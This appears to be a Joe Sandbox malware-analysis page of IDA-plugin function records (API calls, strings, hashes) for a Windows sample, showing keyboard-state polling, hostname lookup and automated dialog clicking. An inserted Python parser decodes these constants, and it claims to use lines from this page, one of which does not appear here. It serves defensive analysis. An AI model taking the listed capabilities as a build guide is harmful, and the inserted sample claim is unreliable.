                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                • String ID: 0.0.0.0
                                                • API String ID: 208665112-3771769585
                                                • Opcode ID: 9dd2e9411d28357725c1876ec98fe2b101f95df8e6cdb6a6079386b94469d7b4
                                                • Instruction ID: fb84e734a0f67623c9458931600bf682c0a6e3b852eb89d31ee7e0ecf50925b2
                                                • Opcode Fuzzy Hash: 9dd2e9411d28357725c1876ec98fe2b101f95df8e6cdb6a6079386b94469d7b4
                                                • Instruction Fuzzy Hash: 6511D231904118AFCB20AB60EC4AEEA77BCDF12731F0441B6F44596291EF7C9A8286A5
                                                APIs
                                                • timeGetTime.WINMM ref: 007D5021
                                                  • Part of subcall function 0079034A: timeGetTime.WINMM(?,75C0B400,00780FDB), ref: 0079034E
                                                • Sleep.KERNEL32(0000000A), ref: 007D504D
                                                • EnumThreadWindows.USER32(?,Function_00064FCF,00000000), ref: 007D5071
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007D5093
                                                • SetActiveWindow.USER32 ref: 007D50B2
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D50C0
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 007D50DF
                                                • Sleep.KERNEL32(000000FA), ref: 007D50EA
                                                • IsWindow.USER32 ref: 007D50F6
                                                • EndDialog.USER32(00000000), ref: 007D5107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: 0e286cc63606c9082bea9a95e12ddf19971dd4ee418e67504261008e725413ae
                                                • Instruction ID: 523dd01222f219ef6c6c16ac8103b74a396a4f677cd777a7d1a54940ace810e3
                                                • Opcode Fuzzy Hash: 0e286cc63606c9082bea9a95e12ddf19971dd4ee418e67504261008e725413ae
                                                • Instruction Fuzzy Hash: 77215070201608BFEB105B34EC89B363B79FB84346B149839F501923B1EE698D60C775
                                                APIs
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • CoInitialize.OLE32(00000000), ref: 007DD676
                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007DD709
                                                • SHGetDesktopFolder.SHELL32(?), ref: 007DD71D
                                                • CoCreateInstance.OLE32(00802D7C,00000000,00000001,00828C1C,?), ref: 007DD769
                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007DD7D8
                                                • CoTaskMemFree.OLE32(?,?), ref: 007DD830
                                                • _memset.LIBCMT ref: 007DD86D
                                                • SHBrowseForFolderW.SHELL32(?), ref: 007DD8A9
                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007DD8CC
                                                • CoTaskMemFree.OLE32(00000000), ref: 007DD8D3
                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007DD90A
                                                • CoUninitialize.OLE32(00000001,00000000), ref: 007DD90C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                • String ID:
                                                • API String ID: 1246142700-0
                                                • Opcode ID: c221bedfa4e274e47de412c340da48c2276392d63a6ae2f06b3512f77dc5317a
                                                • Instruction ID: c26272ce8b13119798b5c6bed16bd709e901e28a370efcf7364c73e27ef095d9
                                                • Opcode Fuzzy Hash: c221bedfa4e274e47de412c340da48c2276392d63a6ae2f06b3512f77dc5317a
                                                • Instruction Fuzzy Hash: 69B1EA75A00109EFDB14DFA4C888DAEBBB9FF88314B148469E909EB361DB34ED41CB50
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D03C8
                                                • SetKeyboardState.USER32(?), ref: 007D0433
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D0453
                                                • GetKeyState.USER32(000000A0), ref: 007D046A
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D0499
                                                • GetKeyState.USER32(000000A1), ref: 007D04AA
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D04D6
                                                • GetKeyState.USER32(00000011), ref: 007D04E4
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D050D
                                                • GetKeyState.USER32(00000012), ref: 007D051B
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0544
                                                • GetKeyState.USER32(0000005B), ref: 007D0552
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: f9029c82fbb16a0771f770f871ae0b25f3e76479631fbb8582f67147459a8185
                                                • Instruction ID: 94949c0495e37b81fdf6715bde9eb0b441b7723d1516d593806452124c6a30a9
                                                • Opcode Fuzzy Hash: f9029c82fbb16a0771f770f871ae0b25f3e76479631fbb8582f67147459a8185
                                                • Instruction Fuzzy Hash: 8A51892090478469EB35DBA49415BAEBFB49F02380F48959FD9C2563C2DA6C9B4CCBE1
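The API entries above are the most useful part of these function records for triage, but the plugin prints every argument as raw hex, so the reader has to decode by hand that GetAsyncKeyState/GetKeyState are polled for 0xA0 (VK_LSHIFT), 0xA1 (VK_RSHIFT), 0x11 (VK_CONTROL), 0x12 (VK_MENU) and 0x5B (VK_LWIN), i.e. only the modifier keys, that SendMessageW is sent 0xF5 (BM_CLICK) and 0x10 (WM_CLOSE), and that the WINMM calls carry MCI command strings. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin: it pulls the API lines out of this listing format, groups them by module, and decodes those constants. The sample lines are copied from the entries on this page; the constant tables are standard Win32 values; the regular expression is an assumption about the plugin's line format and should be checked against other reports before relying on it.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' entries and decode well-known constants.

Added example, not code from the Joe Sandbox report. SAMPLE is constructed
from lines visible in the report; the regex is an assumption about the
plugin's line format.
"""
import re
from collections import defaultdict

# Constructed sample: API lines copied from the report's function records.
SAMPLE = """\
• GetAsyncKeyState.USER32(000000A0), ref: 007D0453
• GetKeyState.USER32(000000A0), ref: 007D046A
• GetAsyncKeyState.USER32(00000011), ref: 007D04D6
• GetAsyncKeyState.USER32(0000005B), ref: 007D0544
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007D50C0
• SendMessageW.USER32(00000010,00000000,00000000), ref: 007D50DF
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007D5410
  • Part of subcall function 00777D2C: _memmove.LIBCMT ref: 00777D66
• Sleep.KERNEL32(000000FA), ref: 007D504D
"""

# Assumed line shape: "• [Part of subcall function X: ]Api.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# Standard winuser.h values for the constants seen in this report.
VK = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL",
      0x12: "VK_MENU", 0x5B: "VK_LWIN"}
WM = {0x10: "WM_CLOSE", 0xF5: "BM_CLICK", 0x173: "STM_GETIMAGE"}


def parse_api_lines(text):
    """Return one record per API line; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        argstr = m.group("args")
        args = [a.strip() for a in argstr.split(",")] if argstr else []
        records.append({
            "api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),  # set when the plugin marks a subcall
        })
    return records


def hex_arg(s):
    """Hex argument as int, or None for '?' / string arguments."""
    try:
        return int(s, 16)
    except ValueError:
        return None


def decode(rec):
    """Human-readable meaning of the argument that matters for this API."""
    api, args = rec["api"], rec["args"]
    if api in ("GetAsyncKeyState", "GetKeyState") and args:
        v = hex_arg(args[0])
        return None if v is None else VK.get(v, f"VK_0x{v:02X}")
    if api == "SendMessageW" and len(args) == 4:  # hwnd, msg, wparam, lparam
        v = hex_arg(args[1])
        return None if v is None else WM.get(v, f"msg_0x{v:04X}")
    if api == "Sleep" and args:
        v = hex_arg(args[0])
        return None if v is None else f"{v} ms"
    if api == "mciSendStringW" and args:
        return f"MCI command: {args[0]!r}"
    return None  # nothing to decode, or argument count is ambiguous


def summarize(records):
    """Sorted API names per module, a quick capability overview."""
    by_mod = defaultdict(set)
    for r in records:
        by_mod[r["module"]].add(r["api"])
    return {m: sorted(apis) for m, apis in by_mod.items()}


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE)
    for r in recs:
        print(f"{r['ref']:08X} {r['module']}!{r['api']} -> {decode(r)}")
    print(summarize(recs))
```

The three-argument SendMessageW line is left undecoded on purpose: the plugin dropped one argument there, so 0x10 cannot be safely read as WM_CLOSE without looking at the disassembly.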
                                                APIs
                                                • GetDlgItem.USER32(?,00000001), ref: 007CC545
                                                • GetWindowRect.USER32(00000000,?), ref: 007CC557
                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007CC5B5
                                                • GetDlgItem.USER32(?,00000002), ref: 007CC5C0
                                                • GetWindowRect.USER32(00000000,?), ref: 007CC5D2
                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007CC626
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CC634
                                                • GetWindowRect.USER32(00000000,?), ref: 007CC645
                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007CC688
                                                • GetDlgItem.USER32(?,000003EA), ref: 007CC696
                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007CC6B3
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 007CC6C0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ItemMoveRect$Invalidate
                                                • String ID:
                                                • API String ID: 3096461208-0
                                                • Opcode ID: 7376b0f4f7f3fff963c53fa17b359d13cf790a125a2adbababe5441e83bb4eec
                                                • Instruction ID: 7bea25a7a7dfda05a59aa8324ce6a068cd7b4555911a1fae348d61c67890c296
                                                • Opcode Fuzzy Hash: 7376b0f4f7f3fff963c53fa17b359d13cf790a125a2adbababe5441e83bb4eec
                                                • Instruction Fuzzy Hash: F5512071B00205ABDB18CF69DD95FAEBBB5EF88710F14812DF519E6290DB74AD00CB54
                                                APIs
                                                  • Part of subcall function 00771B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772036,?,00000000,?,?,?,?,007716CB,00000000,?), ref: 00771B9A
                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007720D3
                                                • KillTimer.USER32(-00000001,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 0077216E
                                                • DestroyAcceleratorTable.USER32(00000000), ref: 007ABE26
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABE57
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABE6E
                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007716CB,00000000,?,?,00771AE2,?,?), ref: 007ABE8A
                                                • DeleteObject.GDI32(00000000), ref: 007ABE9C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                • String ID:
                                                • API String ID: 641708696-0
                                                • Opcode ID: f5f89fbe17f08586935c200f5ebc9c5cce6d3d1c1319f6665ef5410401e8f3ef
                                                • Instruction ID: d66a9de65873a6a6b63af8aeb437bbd26119e7d374ff0a116135111cf36309be
                                                • Opcode Fuzzy Hash: f5f89fbe17f08586935c200f5ebc9c5cce6d3d1c1319f6665ef5410401e8f3ef
                                                • Instruction Fuzzy Hash: B8617C31114A00DFCB359F14D948B2AB7F1FF81352F50C928E6568A972CB79A892DFA4
                                                APIs
                                                  • Part of subcall function 007725DB: GetWindowLongW.USER32(?,000000EB), ref: 007725EC
                                                • GetSysColor.USER32(0000000F), ref: 007721D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ColorLongWindow
                                                • String ID:
                                                • API String ID: 259745315-0
                                                • Opcode ID: fefc055d1cc311279ea2d4e2bd1eb679f34a6e90f35a46128e56bfffe191966f
                                                • Instruction ID: 58569f7d43c8230ea8f26316195d728d8f5dd69a572df73bd123bf62905f81ed
                                                • Opcode Fuzzy Hash: fefc055d1cc311279ea2d4e2bd1eb679f34a6e90f35a46128e56bfffe191966f
                                                • Instruction Fuzzy Hash: FA418D31100544EADF215F289C88BB93BA5FF46361F298365ED698A1E3CB398D42DB25
                                                APIs
                                                • CharLowerBuffW.USER32(?,?,007FF910), ref: 007DA995
                                                • GetDriveTypeW.KERNEL32(00000061,008289A0,00000061), ref: 007DAA5F
                                                • _wcscpy.LIBCMT ref: 007DAA89
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2820617543-1000479233
                                                • Opcode ID: 682737b70241b342d2c404773827f2c06e3560e89658d678f32ea7c4e73a47a7
                                                • Instruction ID: 49c58186dad7f91a7803f4f639ac014bfd3a9070656d3ba5e297418a65f788f0
                                                • Opcode Fuzzy Hash: 682737b70241b342d2c404773827f2c06e3560e89658d678f32ea7c4e73a47a7
                                                • Instruction Fuzzy Hash: 2551CE31118301EFCB14EF14D895AAEB7B5FF85340F10892EF596973A2DB389949CA93
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __i64tow__itow__swprintf
                                                • String ID: %.15g$0x%p$False$True
                                                • API String ID: 421087845-2263619337
                                                • Opcode ID: 15f4789d0683700d519063e98bd260c380a219b98ccf3cf1534d1e4adfcb298e
                                                • Instruction ID: e6845cf6464b5b4aaea9f7b04b12b8365dd272ab261f4b833ce890e616f8249c
                                                • Opcode Fuzzy Hash: 15f4789d0683700d519063e98bd260c380a219b98ccf3cf1534d1e4adfcb298e
                                                • Instruction Fuzzy Hash: 7141F331515605EEEF24DB74D846E7A73E8EB85340F20896EE64DC7291EA39AD42CB10
                                                APIs
                                                • _memset.LIBCMT ref: 007F719C
                                                • CreateMenu.USER32 ref: 007F71B7
                                                • SetMenu.USER32(?,00000000), ref: 007F71C6
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F7253
                                                • IsMenu.USER32(?), ref: 007F7269
                                                • CreatePopupMenu.USER32 ref: 007F7273
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007F72A0
                                                • DrawMenuBar.USER32 ref: 007F72A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                • String ID: 0$F
                                                • API String ID: 176399719-3044882817
                                                • Opcode ID: 48255e7887bdaee260551eb6871a6aa58118faea281df082bc451bbcb3495b8a
                                                • Instruction ID: ad9ef2830e967b66294b946cc7f821be8fce428a0724e449b5947660e0dc4337
                                                • Opcode Fuzzy Hash: 48255e7887bdaee260551eb6871a6aa58118faea281df082bc451bbcb3495b8a
                                                • Instruction Fuzzy Hash: CB416C75A01209EFDB14DF68D884AAA7BF5FF49310F144529FE05A7360D734A920CFA4
                                                APIs
                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007F7590
                                                • CreateCompatibleDC.GDI32(00000000), ref: 007F7597
                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007F75AA
                                                • SelectObject.GDI32(00000000,00000000), ref: 007F75B2
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 007F75BD
                                                • DeleteDC.GDI32(00000000), ref: 007F75C6
                                                • GetWindowLongW.USER32(?,000000EC), ref: 007F75D0
                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007F75E4
                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007F75F0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
• Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                • String ID: static
                                                • API String ID: 2559357485-2160076837
                                                • Opcode ID: cf3368b477009b40c7a031f3b517684602748eb255856d9962de4fa6d666475a
                                                • Instruction ID: 60c983a911f01c64f2c84ae8ac16543f8ac78878b149d946876ffd07035a76c9
                                                • Opcode Fuzzy Hash: cf3368b477009b40c7a031f3b517684602748eb255856d9962de4fa6d666475a
                                                • Instruction Fuzzy Hash: 22316C72105119FBDF159F64DC08FFA3B69FF09320F114224FA15A62A0CB39E820DB68
                                                APIs
                                                • _memset.LIBCMT ref: 00796FBB
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                • __gmtime64_s.LIBCMT ref: 00797054
                                                • __gmtime64_s.LIBCMT ref: 0079708A
                                                • __gmtime64_s.LIBCMT ref: 007970A7
                                                • __allrem.LIBCMT ref: 007970FD
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797119
                                                • __allrem.LIBCMT ref: 00797130
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0079714E
                                                • __allrem.LIBCMT ref: 00797165
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00797183
                                                • __invoke_watson.LIBCMT ref: 007971F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                • String ID:
                                                • API String ID: 384356119-0
                                                • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction ID: cfe9e600a25c174403857ca23b1db65f2810d34b8f15d8f8bd9cf0c77f878a50
                                                • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                • Instruction Fuzzy Hash: 9D711871A4471AEBEF189F78EC46B5AB3A9AF81320F14433AF414D7281E778DA40C790
                                                APIs
                                                • _memset.LIBCMT ref: 007D283A
                                                • GetMenuItemInfoW.USER32(00835890,000000FF,00000000,00000030), ref: 007D289B
                                                • SetMenuItemInfoW.USER32(00835890,00000004,00000000,00000030), ref: 007D28D1
                                                • Sleep.KERNEL32(000001F4), ref: 007D28E3
                                                • GetMenuItemCount.USER32(?), ref: 007D2927
                                                • GetMenuItemID.USER32(?,00000000), ref: 007D2943
                                                • GetMenuItemID.USER32(?,-00000001), ref: 007D296D
                                                • GetMenuItemID.USER32(?,?), ref: 007D29B2
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007D29F8
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A0C
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                • String ID:
                                                • API String ID: 4176008265-0
                                                • Opcode ID: 16f1a9bbc2564e0624c3715119151fa1a89fd8253780d942edfaaf9ab847ee45
                                                • Instruction ID: 6d1c2e510c209469101a74ea90c5be56a895ae9786c1dab970971a36097d00d1
                                                • Opcode Fuzzy Hash: 16f1a9bbc2564e0624c3715119151fa1a89fd8253780d942edfaaf9ab847ee45
                                                • Instruction Fuzzy Hash: 4361A1B0904249AFDB21CF64DC889BE7BB9FF55304F14405AE842A7352DB39AD07DB20
                                                APIs
                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007F6FD7
                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007F6FDA
                                                • GetWindowLongW.USER32(?,000000F0), ref: 007F6FFE
                                                • _memset.LIBCMT ref: 007F700F
